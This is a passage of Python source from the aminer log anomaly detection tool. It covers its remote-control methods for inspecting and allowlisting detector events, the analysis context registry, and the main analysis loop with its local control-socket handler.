MinimalTransitionTimeDetector and PathValueTimeIntervalDetector." return try: msg = component.remove_from_persistence_event(f"Analysis.{component.__class__.__name__}", event_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) # skipcq: PYL-W0703 except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def add_handler_to_atom_filter_and_register_analysis_component(self, analysis_context, atom_handler, component, component_name): """ Add a new component to the analysis_context. @param analysis_context the analysis context of the aminer. @param atom_handler the registered name of the atom_handler component to add the new component to. @param component the component to be added. @param component_name the name to be registered in the analysis_context. """ atom_filter = analysis_context.get_component_by_name(atom_handler) if atom_filter is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: atom_handler '{atom_handler}' does not exist!" return if analysis_context.get_component_by_name(component_name) is not None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component with same name already registered! ({component_name})" return if not isinstance(component, AtomHandlerInterface): self.REMOTE_CONTROL_RESPONSE += "FAILURE: 'component' must implement the AtomHandlerInterface!" return atom_filter.add_handler(component) analysis_context.register_component(component, component_name) msg = f"Component '{component_name}' added to '{atom_handler}' successfully." self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def dump_events_from_history(self, analysis_context, history_component_name, dump_event_id): """ Detailed print of a specific event from the history. @param analysis_context the analysis context of the aminer. @param history_component_name the registered name of the history component. @param dump_event_id a numeric id of the events to be printed. """ self.REMOTE_CONTROL_RESPONSE = None history_handler = analysis_context.get_component_by_name(history_component_name) if history_handler is None: self.REMOTE_CONTROL_RESPONSE = component_not_found else: history_data = history_handler.get_history() result_string = 'FAIL: not found' for event_pos in enumerate(history_data): event_id, event_type, event_message, sorted_log_lines, event_data, _event_source = history_data[event_pos] if event_id != dump_event_id: continue append_log_lines_flag = True result_string = f"OK\nEvent {event_id}: {event_message} ({event_type})" if event_type == 'Analysis.NewMatchPathDetector': result_string += f"\n Logline: {sorted_log_lines[0]}" elif event_type == 'Analysis.NewMatchPathValueComboDetector': result_string += '\nParser match:\n' + event_data[0].parser_match.matchElement.annotate_match(' ') elif event_type == 'Analysis.AllowlistViolationDetector': result_string += '\nParser match:\n' + event_data.parser_match.matchElement.annotate_match(' ') elif event_type == 'ParserModel.UnparsedData': result_string += f"\n Unparsed line: {sorted_log_lines[0]}" append_log_lines_flag = False else: result_string += f"\n Data: {str(event_data)}" if append_log_lines_flag and (sorted_log_lines is not None) and (len(sorted_log_lines) != 0): result_string += '\n Log lines:\n %s' % '\n '.join(sorted_log_lines) break self.REMOTE_CONTROL_RESPONSE = result_string logging.getLogger(DEBUG_LOG_NAME).info(result_string) def ignore_events_from_history(self, analysis_context, history_component_name, event_ids): """ Ignore one or multiple specific events from the history. These ignores do not affect the components itself. @param analysis_context the analysis context of the aminer. @param history_component_name the registered name of the history component. @param event_ids a list of numeric ids of the events to be ignored. """ history_handler = analysis_context.get_component_by_name(history_component_name) if history_handler is None: self.REMOTE_CONTROL_RESPONSE = component_not_found return history_data = history_handler.get_history() id_spec_list = [] for element in event_ids: if isinstance(element, list): id_spec_list.append(element) delete_count = 0 event_pos = 0 while event_pos < len(history_data): event_id, _event_type, _event_message, _sorted_log_lines, _event_data, _event_source = history_data[event_pos] may_delete_flag = False if event_id in event_ids: may_delete_flag = True else: for id_range in id_spec_list: if id_range[0] <= event_id <= id_range[1]: may_delete_flag = True if may_delete_flag: history_data[:] = history_data[:event_pos] + history_data[event_pos + 1:] delete_count += 1 else: event_pos += 1 msg = f"OK\n{delete_count} elements ignored" self.REMOTE_CONTROL_RESPONSE = msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def list_events_from_history(self, analysis_context, history_component_name, max_event_count=None): """ List the latest events of a specific history component. @param analysis_context the analysis context of the aminer. @param history_component_name the registered name of the history component. @param max_event_count the number of the newest events to be listed. """ history_handler = analysis_context.get_component_by_name(history_component_name) if history_handler is None: self.REMOTE_CONTROL_RESPONSE = component_not_found else: history_data = history_handler.get_history() max_events = len(history_data) if max_event_count is None or max_events < max_event_count: max_event_count = max_events result_string = 'OK' for event_id, _event_type, event_message, sorted_log_lines, _event_data, _event_source in history_data[:max_event_count]: result_string += f"\nEvent {event_id}: {event_message}; Log data: {repr(sorted_log_lines)}"[:240] self.REMOTE_CONTROL_RESPONSE = result_string def allowlist_events_from_history(self, analysis_context, history_component_name, id_spec_list, allowlisting_data=None): """ Allowlists one or multiple specific events from the history in the component it occurred in. @param analysis_context the analysis context of the aminer. @param history_component_name the registered name of the history component. @param id_spec_list a list of numeric ids of the events to be allowlisted. @param allowlisting_data this data is passed on into the allowlist_event method. """ from aminer.events.EventInterfaces import EventSourceInterface history_handler = analysis_context.get_component_by_name(history_component_name) if history_handler is None: self.REMOTE_CONTROL_RESPONSE = component_not_found return if id_spec_list is None or not isinstance(id_spec_list, list): self.REMOTE_CONTROL_RESPONSE = \ 'Request requires remote_control_data with ID specification list and optional allowlisting information.' return history_data = history_handler.get_history() result_string = '' lookup_count = 0 event_pos = 0 while event_pos < len(history_data): event_id, event_type, _event_message, sorted_log_lines, event_data, event_source = history_data[event_pos] found_flag = False if event_id in id_spec_list: found_flag = True else: for id_range in id_spec_list: if isinstance(id_range, list) and (id_range[0] <= event_id <= id_range[1]): found_flag = True if not found_flag: event_pos += 1 continue lookup_count += 1 allowlisted_flag = False if isinstance(event_source, EventSourceInterface): # This should be the default for all detectors. try: message = event_source.allowlist_event( event_type, sorted_log_lines, event_data, allowlisting_data) result_string += f"OK {event_id}: {message}\n" logging.getLogger(DEBUG_LOG_NAME).info(result_string) allowlisted_flag = True except NotImplementedError: result_string += f"FAIL {event_id}: component does not support allowlisting." # skipcq: PYL-W0703 except Exception as wl_exception: result_string += f"FAIL {event_id}: {str(wl_exception)}\n" elif event_type == 'Analysis.AllowlistViolationDetector': result_string += f"FAIL {event_id}: No automatic modification of allowlist rules, manual changes required\n" allowlisted_flag = True elif event_type == 'ParserModel.UnparsedData': result_string += f"FAIL {event_id}: No automatic modification of parsers yet\n" else: result_string += f"FAIL {event_id}: Unsupported event type {event_type}\n" if allowlisted_flag: # Clear the allowlisted event. history_data[:] = history_data[:event_pos] + history_data[event_pos + 1:] else: event_pos += 1 if lookup_count == 0: result_string = 'FAIL: Not a single event ID from specification found' self.REMOTE_CONTROL_RESPONSE = result_string def reopen_event_handler_streams(self, analysis_context): """Reopen all StreamPrinterEventHandler streams for log rotation.""" analysis_context.close_event_handler_streams(analysis_context.atomizer_factory.event_handler_list, reopen=True) msg = "Reopened all StreamPrinterEventHandler streams." self.REMOTE_CONTROL_RESPONSE = msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def _repr_recursive(attr): """ Return a valid JSON representation of an config attribute with the types list, dict, set or tuple. @param attr the attribute to be represented. """ if attr is None: return None if isinstance(attr, (bool, type(AminerConfig))): rep = str(attr) elif isinstance(attr, (int, str, float)): rep = attr elif isinstance(attr, bytes): rep = attr.decode() elif isinstance(attr, (list, tuple, set)): if isinstance(attr, (tuple, set)): attr = list(attr) for i, a in enumerate(attr): attr[i] = _repr_recursive(a) rep = str(attr).replace('\\"', "'").replace("'[", "[").replace("]'", "]").replace("'", '"').replace('"False"', 'false').replace( '"True"', 'true').replace('"None"', 'null') elif isinstance(attr, dict): new_attr = {} for key in attr.keys(): value = _repr_recursive(key) if isinstance(value, str): value = value.replace('\\"', "'") new_attr[str(key)] = value rep = str(new_attr).replace("'[", "[").replace("]'", "]") else: rep = attr.__class__.__name__ return rep def _reformat_attr(attr): """ Return a valid JSON representation of an config attribute with any type. If the type is list, dict, set or tuple _repr_recursive is called. @param attr the attribute to be represented. """ if type(attr) in (int, str, float, bool, type(AminerConfig), type(None)): rep = str(attr) elif isinstance(attr, bytes): rep = attr.decode() elif isinstance(attr, (list, dict, set, tuple)): rep = _repr_recursive(attr) else: rep = attr.__class__.__name__ if rep.startswith("'") and rep.endswith("'") and rep.count("'") == 2: rep = rep.replace("'", '"') elif rep.strip('"').startswith("'") and rep.strip('"').endswith("'") and rep.strip('"').count("'") == 2: rep = rep.strip('"').replace("'", '"') else: rep = rep.strip('"').replace("'", '\\"') if not isinstance(attr, (list, dict, tuple, set)) and not rep.startswith('"') and not rep.isdecimal(): try: float(rep) except ValueError: # skipcq: FLK-E722 rep = f'"{rep}"' return rep logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/AnalysisChild.py000066400000000000000000001335271437606560100323230ustar00rootroot00000000000000""" This module contains classes for execution of py child process main analysis loop. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import base64 import errno import fcntl import json import os import select import socket import struct import sys import time import traceback import resource import logging from datetime import datetime import shutil from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, KEY_RESOURCES_MAX_MEMORY_USAGE, KEY_LOG_STAT_PERIOD,\ DEFAULT_STAT_PERIOD, KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR, REMOTE_CONTROL_LOG_NAME, KEY_PERSISTENCE_PERIOD,\ DEFAULT_PERSISTENCE_PERIOD from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.events.JsonConverterHandler import JsonConverterHandler from aminer.input.LogStream import LogStream from aminer.util import PersistenceUtil from aminer.util import SecureOSFunctions from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import JsonUtil from aminer.AminerRemoteControlExecutionMethods import AminerRemoteControlExecutionMethods class AnalysisContext: """This class collects information about the current analysis context to access it during analysis or remote management.""" TIME_TRIGGER_CLASS_REALTIME = 1 TIME_TRIGGER_CLASS_ANALYSISTIME = 2 def __init__(self, aminer_config): self.aminer_config = aminer_config # This is the factory to create atomizers for incoming data streams and link them to the analysis pipeline. self.atomizer_factory = None # This is the current log processing and analysis time regarding the data stream being analyzed. While None, the analysis time # e.g. used to trigger components (see analysisTimeTriggeredComponents), is the same as current system time. For forensic analysis # this time has to be updated to values derived from the log data input to reflect the current log processing time, which will be in # the past and may progress much faster than real system time. self.analysis_time = None # Keep a registry of all analysis and filter configuration for later use. Remote control interface may then access them for # runtime reconfiguration. self.next_registry_id = 0 self.registered_components = {} # Keep also a list of components by name. self.registered_components_by_name = {} # Keep lists of components that should receive timer interrupts when real time or analysis time has elapsed. self.real_time_triggered_components = [] self.analysis_time_triggered_components = [] self.suppress_detector_list = [] def add_time_triggered_component(self, component, trigger_class=None): """Add a time-triggered component to the registry.""" if not isinstance(component, TimeTriggeredComponentInterface): msg = f"Attempting to register component of class {component.__class__.__name__} not implementing " \ f"aminer.util.TimeTriggeredComponentInterface" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if trigger_class is None: trigger_class = component.get_time_trigger_class() if trigger_class == AnalysisContext.TIME_TRIGGER_CLASS_REALTIME: self.real_time_triggered_components.append(component) elif trigger_class == AnalysisContext.TIME_TRIGGER_CLASS_ANALYSISTIME: self.analysis_time_triggered_components.append(component) else: msg = f"Attempting to timer component for unknown class {trigger_class}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) logging.getLogger(DEBUG_LOG_NAME).debug( 'Called %s for the component %s', 'add_time_triggered_component', component.__class__.__name__) def register_component(self, component, component_name=None, register_time_trigger_class_override=None): """ Register a new component. A component implementing the TimeTriggeredComponentInterface will also be added to the appropriate lists unless registerTimeTriggerClassOverride is specified. @param component the component to be registered. @param component_name an optional name assigned to the component when registering. When no name is specified, the detector class name plus an identifier will be used. When a component with the same name was already registered, this will cause an error. @param register_time_trigger_class_override if not none, ignore the time trigger class supplied by the component and register it for the classes specified in the override list. Use an empty list to disable registration. """ if component_name is None: component_name = str(component.__class__.__name__) + str(self.next_registry_id) if component_name in self.registered_components_by_name: msg = 'Component with same name already registered' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if register_time_trigger_class_override is not None and not isinstance(component, TimeTriggeredComponentInterface): msg = 'Requesting override on component not implementing TimeTriggeredComponentInterface' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.registered_components[self.next_registry_id] = (component, component_name) self.next_registry_id += 1 self.registered_components_by_name[component_name] = component if isinstance(component, TimeTriggeredComponentInterface): if register_time_trigger_class_override is None: self.add_time_triggered_component(component) else: for trigger_class in register_time_trigger_class_override: self.add_time_triggered_component(component, trigger_class) logging.getLogger(DEBUG_LOG_NAME).debug( "Registered component %s with the id %d and component_name '%s'.", component.__class__.__name__, self.next_registry_id - 1, component_name) def get_registered_component_ids(self): """Get a list of currently known component IDs.""" return self.registered_components.keys() def get_component_by_id(self, id_string): """ Get a component by ID. @return None if not found. """ component_info = self.registered_components.get(id_string) if component_info is None: return None return component_info[0] def get_registered_component_names(self): """Get a list of currently known component names.""" return list(self.registered_components_by_name.keys()) def get_component_by_name(self, name): """ Get a component by name. @return None if not found. """ return self.registered_components_by_name.get(name) def get_name_by_component(self, component): """ Get the name of a component. @return None if not found. """ for component_name, component_iter in self.registered_components_by_name.items(): if component_iter == component: return component_name return None def get_id_by_component(self, component): """ Get the name of a component. @return None if not found. """ for component_id, component_iter in self.registered_components.items(): if component_iter[0] == component: return component_id return None def build_analysis_pipeline(self): """Create the pipeline.""" logging.getLogger(DEBUG_LOG_NAME).debug("Started with build_analysis_pipeline.") self.aminer_config.build_analysis_pipeline(self) def close_event_handler_streams(self, event_handlers, reopen=False): """Close the streams of all StreamPrinterEventHandlers.""" for event_handler in event_handlers: if isinstance(event_handler, StreamPrinterEventHandler): # Can not rotate sys.stdout. Consider using the copytruncate option of logrotate instead. if event_handler.stream.name in ("", ""): continue try: event_handler.stream.close() if reopen: event_handler.stream = open(event_handler.stream.name, "w+") except IOError as e: msg = f"Error when closing or opening stream with the name {event_handler.stream.name}, shutting down.\n{e}" logging.getLogger(DEBUG_LOG_NAME).critical(msg) print(msg, file=sys.stderr) sys.exit(1) elif isinstance(event_handler, JsonConverterHandler): self.close_event_handler_streams(event_handler.json_event_handlers) suspended_flag = False class AnalysisChild(TimeTriggeredComponentInterface): """ This class defines the child performing the complete analysis workflow. When splitting privileges between analysis and monitor process, this class should only be initialized within the analysis process! """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME offline_mode = False def __init__(self, program_name, aminer_config): self.program_name = program_name self.aminer_config = aminer_config self.analysis_context = AnalysisContext(aminer_config) self.run_analysis_loop_flag = True self.log_streams_by_name = {} self.persistence_file_name = build_persistence_file_name( self.analysis_context.aminer_config, self.__class__.__name__ + '/RepositioningData') self.next_persist_time = time.time() + self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.repositioning_data_dict = {} self.master_control_socket = None self.remote_control_socket = None # This dictionary provides a lookup list from file descriptor to associated object for handling the data to and from the given # descriptor. Currently supported handler objects are: # * Parent process socket # * Remote control listening socket # * LogStreams # * Remote control connections self.tracked_fds_dict = {} # Override the signal handler to allow graceful shutdown. def graceful_shutdown_handler(_signo, _stack_frame): """React on typical shutdown signals.""" msg = f"{program_name}: caught signal, shutting down" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).info(msg) self.run_analysis_loop_flag = False import signal signal.signal(signal.SIGHUP, graceful_shutdown_handler) signal.signal(signal.SIGINT, graceful_shutdown_handler) signal.signal(signal.SIGTERM, graceful_shutdown_handler) # Do this on at the end of the initialization to avoid having partially initialized objects inside the registry. self.analysis_context.add_time_triggered_component(self) def run_analysis(self, master_fd): """ Run the analysis thread. @param master_fd the main communication socket to the parent to receive logfile updates from the parent. @return 0 on success, e.g. normal termination via signal or 1 on error. """ # The masterControlSocket is the socket to communicate with the master process to receive commands or logstream data. Expect # the parent/child communication socket on fd 3. This also duplicates the fd, so close the old one. self.master_control_socket = socket.fromfd(master_fd, socket.AF_UNIX, socket.SOCK_DGRAM, 0) os.close(master_fd) self.tracked_fds_dict[self.master_control_socket.fileno()] = self.master_control_socket # Locate the real analysis configuration. self.analysis_context.build_analysis_pipeline() if self.analysis_context.atomizer_factory is None: msg = 'build_analysis_pipeline() did not initialize atomizer_factory, terminating' print('FATAL: ' + msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).critical(msg) return 1 real_time_triggered_components = self.analysis_context.real_time_triggered_components analysis_time_triggered_components = self.analysis_context.analysis_time_triggered_components max_memory_mb = self.analysis_context.aminer_config.config_properties.get(KEY_RESOURCES_MAX_MEMORY_USAGE, None) if max_memory_mb is not None: try: max_memory_mb = int(max_memory_mb) resource.setrlimit(resource.RLIMIT_AS, (max_memory_mb * 1024 * 1024, resource.RLIM_INFINITY)) logging.getLogger(DEBUG_LOG_NAME).debug('set max memory limit to %d MB.', max_memory_mb) except ValueError: msg = f"{KEY_RESOURCES_MAX_MEMORY_USAGE} must be an integer, terminating" print('FATAL: ' + msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).critical(msg) return 1 # Load continuation data for last known log streams. The loaded data has to be a dictionary with repositioning information for # each stream. The data is used only when creating the first stream with that name. self.repositioning_data_dict = PersistenceUtil.load_json(self.persistence_file_name) if self.repositioning_data_dict is None: self.repositioning_data_dict = {} # A list of LogStreams where handleStream() blocked due to downstream not being able to consume the data yet. blocked_log_streams = [] # Always start when number is None. next_real_time_trigger_time = None next_analysis_time_trigger_time = None next_backup_time_trigger_time = None log_stat_period = self.analysis_context.aminer_config.config_properties.get( KEY_LOG_STAT_PERIOD, DEFAULT_STAT_PERIOD) next_statistics_log_time = time.time() + log_stat_period delayed_return_status = 0 while self.run_analysis_loop_flag: # Build the list of inputs to select for anew each time: the LogStream file descriptors may change due to rollover. input_select_fd_list = [] output_select_fd_list = [] for fd_handler_object in self.tracked_fds_dict.values(): if isinstance(fd_handler_object, LogStream): stream_fd = fd_handler_object.get_current_fd() if stream_fd < 0: continue input_select_fd_list.append(stream_fd) elif isinstance(fd_handler_object, AnalysisChildRemoteControlHandler): fd_handler_object.add_select_fds(input_select_fd_list, output_select_fd_list) else: # This has to be a socket, just add the file descriptor. input_select_fd_list.append(fd_handler_object.fileno()) # Loop over the list in reverse order to avoid skipping elements in remove. if not suspended_flag: for log_stream in reversed(blocked_log_streams): current_stream_fd = log_stream.handle_stream() if current_stream_fd >= 0: self.tracked_fds_dict[current_stream_fd] = log_stream input_select_fd_list.append(current_stream_fd) blocked_log_streams.remove(log_stream) read_list = None write_list = None try: (read_list, write_list, _except_list) = select.select(input_select_fd_list, output_select_fd_list, [], 1) except select.error as select_error: # Interrupting signals, e.g. for shutdown are OK. if select_error[0] == errno.EINTR: continue msg = f"Unexpected select result {str(select_error)}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) delayed_return_status = 1 break for read_fd in read_list: fd_handler_object = self.tracked_fds_dict[read_fd] if isinstance(fd_handler_object, LogStream): # Handle this LogStream. Only when downstream processing blocks, add the stream to the blocked stream list. handle_result = fd_handler_object.handle_stream() if handle_result < 0: # No need to care if current internal file descriptor in LogStream has changed in handleStream(), # this will be handled when unblocking. del self.tracked_fds_dict[read_fd] blocked_log_streams.append(fd_handler_object) elif handle_result != read_fd: # The current fd has changed, update the tracking list. del self.tracked_fds_dict[read_fd] self.tracked_fds_dict[handle_result] = fd_handler_object continue if isinstance(fd_handler_object, AnalysisChildRemoteControlHandler): try: fd_handler_object.do_receive() except ConnectionError as receiveException: msg = f"Unclean termination of remote control: {str(receiveException)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) print(msg, file=sys.stderr) if fd_handler_object.is_dead(): logging.getLogger(DEBUG_LOG_NAME).debug('Deleting fd %s from tracked_fds_dict.', str(read_fd)) del self.tracked_fds_dict[read_fd] # Reading is only attempted when output buffer was already flushed. Try processing the next request to fill the output # buffer for next round. else: fd_handler_object.do_process(self.analysis_context) continue if fd_handler_object == self.master_control_socket: self.handle_master_control_socket_receive() continue if fd_handler_object == self.remote_control_socket: # We received a remote connection, accept it unconditionally. Users should make sure, that they do not exhaust # resources by hogging open connections. (control_client_socket, _remote_address) = self.remote_control_socket.accept() # Keep track of information received via this remote control socket. remote_control_handler = AnalysisChildRemoteControlHandler(control_client_socket) self.tracked_fds_dict[control_client_socket.fileno()] = remote_control_handler continue msg = f"Unhandled object type {type(fd_handler_object)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) for write_fd in write_list: fd_handler_object = self.tracked_fds_dict[write_fd] if isinstance(fd_handler_object, AnalysisChildRemoteControlHandler): buffer_flushed_flag = False try: buffer_flushed_flag = fd_handler_object.do_send() except OSError as sendError: msg = f"Error at sending data via remote control: {str(sendError)}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) try: fd_handler_object.terminate() except ConnectionError as terminateException: msg = f"Unclean termination of remote control: {str(terminateException)}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) if buffer_flushed_flag: fd_handler_object.do_process(self.analysis_context) if fd_handler_object.is_dead(): del self.tracked_fds_dict[write_fd] continue msg = f"Unhandled object type {type(fd_handler_object)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Handle the real time events. real_time = time.time() if next_real_time_trigger_time is None or real_time >= next_real_time_trigger_time: next_trigger_offset = 3600 for component in real_time_triggered_components: if not suspended_flag: next_trigger_request = component.do_timer(real_time) next_trigger_offset = min(next_trigger_offset, next_trigger_request) next_real_time_trigger_time = real_time + next_trigger_offset if real_time >= next_statistics_log_time: next_statistics_log_time = real_time + log_stat_period logging.getLogger(DEBUG_LOG_NAME).debug('Statistics logs are written..') # log the statistics for every component. for component_name in self.analysis_context.registered_components_by_name: component = self.analysis_context.registered_components_by_name[component_name] component.log_statistics(component_name) # Handle the analysis time events. The analysis time will be different when an analysis time component is registered. analysis_time = self.analysis_context.analysis_time if analysis_time is None: analysis_time = real_time if next_analysis_time_trigger_time is None or analysis_time >= next_analysis_time_trigger_time: next_trigger_offset = 3600 for component in analysis_time_triggered_components: if not suspended_flag: next_trigger_request = component.do_timer(real_time) next_trigger_offset = min(next_trigger_offset, next_trigger_request) next_analysis_time_trigger_time = analysis_time + next_trigger_offset # backup the persistence data. backup_time = time.time() backup_time_str = datetime.fromtimestamp(backup_time).strftime('%Y-%m-%d-%H-%M-%S') persistence_dir = self.analysis_context.aminer_config.config_properties.get( KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR) persistence_dir = persistence_dir.rstrip('/') backup_path = persistence_dir + '/backup/' backup_path_with_date = os.path.join(backup_path, backup_time_str) if next_backup_time_trigger_time is None or backup_time >= next_backup_time_trigger_time: next_trigger_offset = 3600 * 24 if next_backup_time_trigger_time is not None: shutil.copytree(persistence_dir, backup_path_with_date, ignore=shutil.ignore_patterns('backup*')) logging.getLogger(DEBUG_LOG_NAME).info('Persistence backup created in %s.', backup_path_with_date) next_backup_time_trigger_time = backup_time + next_trigger_offset if len(self.tracked_fds_dict) == 1 and self.offline_mode: self.run_analysis_loop_flag = False # Analysis loop is only left on shutdown. Try to persist everything and leave. PersistenceUtil.persist_all() for sock in self.tracked_fds_dict.values(): sock.close() self.analysis_context.close_event_handler_streams(self.analysis_context.atomizer_factory.event_handler_list) return delayed_return_status def handle_master_control_socket_receive(self): """ Receive information from the parent process via the master control socket. This method may only be invoked when receiving is guaranteed to be nonblocking and to return data. """ # We cannot fail with None here as the socket was in the readList. (received_fd, received_type_info, annotation_data) = SecureOSFunctions.receive_annoted_file_descriptor(self.master_control_socket) if received_type_info == b'logstream': repositioning_data = self.repositioning_data_dict.get(annotation_data, None) if repositioning_data is not None: del self.repositioning_data_dict[annotation_data] res = None if annotation_data.startswith(b'file://'): from aminer.input.LogStream import FileLogDataResource res = FileLogDataResource(annotation_data, received_fd, repositioning_data=repositioning_data) elif annotation_data.startswith(b'unix://'): from aminer.input.LogStream import UnixSocketLogDataResource res = UnixSocketLogDataResource(annotation_data, received_fd) else: msg = 'Filedescriptor of unknown type received' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Make fd nonblocking. fd_flags = fcntl.fcntl(res.get_file_descriptor(), fcntl.F_GETFL) fcntl.fcntl(res.get_file_descriptor(), fcntl.F_SETFL, fd_flags | os.O_NONBLOCK) log_stream = self.log_streams_by_name.get(res.get_resource_name()) if log_stream is None: stream_atomizer = self.analysis_context.atomizer_factory.get_atomizer_for_resource(res.get_resource_name()) log_stream = LogStream(res, stream_atomizer) self.tracked_fds_dict[res.get_file_descriptor()] = log_stream self.log_streams_by_name[res.get_resource_name()] = log_stream else: log_stream.add_next_resource(res) elif received_type_info == b'remotecontrol': if self.remote_control_socket is not None: msg = 'Received another remote control socket: multiple remote control not supported (yet?).' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.remote_control_socket = socket.fromfd(received_fd, socket.AF_UNIX, socket.SOCK_STREAM, 0) os.close(received_fd) self.tracked_fds_dict[self.remote_control_socket.fileno()] = self.remote_control_socket else: msg = f"Unhandled type info on received fd: {repr(received_type_info)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) def do_timer(self, trigger_time): """ Perform trigger actions and to determine the time for next invocation. The caller may decide to invoke this method earlier than requested during the previous call. Classes implementing this method have to handle such cases. Each class should try to limit the time spent in this method as it might delay trigger signals to other components. For extensive compuational work or IO, a separate thread should be used. @param trigger_time the time this trigger is invoked. This might be the current real time when invoked from real time timers or the forensic log timescale time value. @return the number of seconds when next invocation of this trigger is required. """ delta = self.next_persist_time - trigger_time if delta <= 0: self.repositioning_data_dict = {} for log_stream_name, log_stream in self.log_streams_by_name.items(): repositioning_data = log_stream.get_repositioning_data() if repositioning_data is not None: self.repositioning_data_dict[log_stream_name] = repositioning_data PersistenceUtil.store_json(self.persistence_file_name, self.repositioning_data_dict) delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta logging.getLogger(DEBUG_LOG_NAME).debug('Repositioning data was persisted.') return delta class AnalysisChildRemoteControlHandler: """ This class stores information about one open remote control connection. The handler can be in 3 different states: * receive request: the control request was not completely received. The main process may use select() to wait for input data without blocking or polling. * execute: the request is complete and is currently under execution. In that mode all other aminer analysis activity is blocked. * respond: send back results from execution. All sent and received control packets have following common structure: * Total length in bytes (4 bytes): The maximal length is currently limited to 64k * Type code (4 bytes) * Data The handler processes following types: * Execute request ('EEEE'): Data is loaded as json artefact containing a list with two elements. The first one is the Python code to be executed. The second one is available within the execution namespace as 'remoteControlData'. The handler produces following requests: * Execution response ('RRRR'): The response contains a json artefact with a two element list. The first element is the content of 'remoteControlResponse' from the Python execution namespace. The second one is the exception message and traceback as string if an error has occured. Method naming: * do...(): Those methods perform an action consuming input or output buffer data. * may...(): Those methods return true if it would make sense to call a do...() method with the same name. * put...(): Those methods put a request on the buffers. """ max_control_packet_size = 1 << 32 def __init__(self, control_client_socket): self.control_client_socket = control_client_socket self.remote_control_fd = control_client_socket.fileno() self.input_buffer = b'' self.output_buffer = b'' def may_receive(self): """Check if this handler may receive more requests.""" return len(self.output_buffer) == 0 def do_process(self, analysis_context): """Process the next request, if any.""" request_data = self.do_get() if request_data is None: return request_type = request_data[4:8] if request_type == b'EEEE': json_remote_control_response = None exception_data = None try: json_request_data = (json.loads(request_data[8:].decode())) json_request_data = JsonUtil.decode_object(json_request_data) if (json_request_data is None) or (not isinstance(json_request_data, list)) or (len(json_request_data) != 2): msg = 'Invalid request data' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if json_request_data[0] and isinstance(json_request_data[0], bytes): json_request_data[0] = json_request_data[0].decode() if json_request_data[1]: if isinstance(json_request_data[1], list): new_list = [] for item in json_request_data[1]: if isinstance(item, bytes): new_list.append(item.decode()) else: new_list.append(item) json_request_data[1] = new_list else: json_request_data[1] = json_request_data[1].decode() methods = AminerRemoteControlExecutionMethods() from aminer.analysis import EnhancedNewMatchPathValueComboDetector, EventCorrelationDetector, EventTypeDetector, \ EventFrequencyDetector, EventSequenceDetector, HistogramAnalysis, MatchFilter, MatchValueAverageChangeDetector,\ MatchValueStreamWriter, MissingMatchPathValueDetector, NewMatchIdValueComboDetector, NewMatchPathDetector,\ NewMatchPathValueComboDetector, NewMatchPathValueDetector, ParserCount, Rules, TimeCorrelationDetector,\ TimeCorrelationViolationDetector, TimestampCorrectionFilters, TimestampsUnsortedDetector, VariableTypeDetector,\ AllowlistViolationDetector, EventCountClusterDetector exec_locals = { 'analysis_context': analysis_context, 'remote_control_data': json_request_data[1], 'print_current_config': methods.print_current_config, 'print_config_property': methods.print_config_property, 'print_attribute_of_registered_analysis_component': methods.print_attribute_of_registered_analysis_component, 'change_config_property': methods.change_config_property, 'change_attribute_of_registered_analysis_component': methods.change_attribute_of_registered_analysis_component, 'rename_registered_analysis_component': methods.rename_registered_analysis_component, 'add_handler_to_atom_filter_and_register_analysis_component': methods.add_handler_to_atom_filter_and_register_analysis_component, 'save_current_config': methods.save_current_config, 'allowlist_event_in_component': methods.allowlist_event_in_component, 'blocklist_event_in_component': methods.blocklist_event_in_component, 'print_persistency_event_in_component': methods.print_persistency_event_in_component, 'add_to_persistency_event_in_component': methods.add_to_persistency_event_in_component, 'remove_from_persistency_event_in_component': methods.remove_from_persistency_event_in_component, 'dump_events_from_history': methods.dump_events_from_history, 'ignore_events_from_history': methods.ignore_events_from_history, 'list_events_from_history': methods.list_events_from_history, 